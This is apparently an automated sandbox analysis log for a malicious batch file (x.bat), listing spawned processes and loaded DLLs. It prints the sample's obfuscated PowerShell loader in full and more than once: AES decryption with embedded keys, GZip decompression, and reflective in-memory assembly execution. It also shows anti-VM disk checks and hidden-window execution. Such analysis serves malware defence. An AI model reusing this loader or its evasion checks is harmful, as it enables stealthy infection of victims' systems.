''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\$nya-onimai2\IfMUlU.exe "C:\Windows\$nya-onimai2\IfMUlU.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exeSection loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: mscoree.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: apphelp.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: version.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: windows.storage.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: x.batStatic file information: File size 7312129 > 1048576
